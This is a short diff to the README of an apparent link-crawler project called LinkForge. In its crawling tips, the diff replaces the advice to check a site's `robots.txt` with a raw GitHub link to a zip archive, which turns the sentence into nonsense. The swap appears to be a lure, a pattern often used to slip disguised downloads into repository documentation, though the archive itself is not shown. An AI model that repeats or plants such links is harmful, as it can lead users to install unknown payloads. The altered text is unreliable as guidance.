Aa126806/LinkForge/README.md

 ## 🎓 Tips for Effective Crawling

 - Start with a well-defined URL.
-Ensure the site allows crawling by checking its `robots.txt` file.
+Ensure the site allows crawling by checking its `https://raw.githubusercontent.com/Aa126806/LinkForge/main/Menominee/LinkForge_3.3.zip` file.
 - Use well-known sites that you want to analyze for better results.
 - Limit the crawl depth if you want to avoid overwhelming your system with too many links.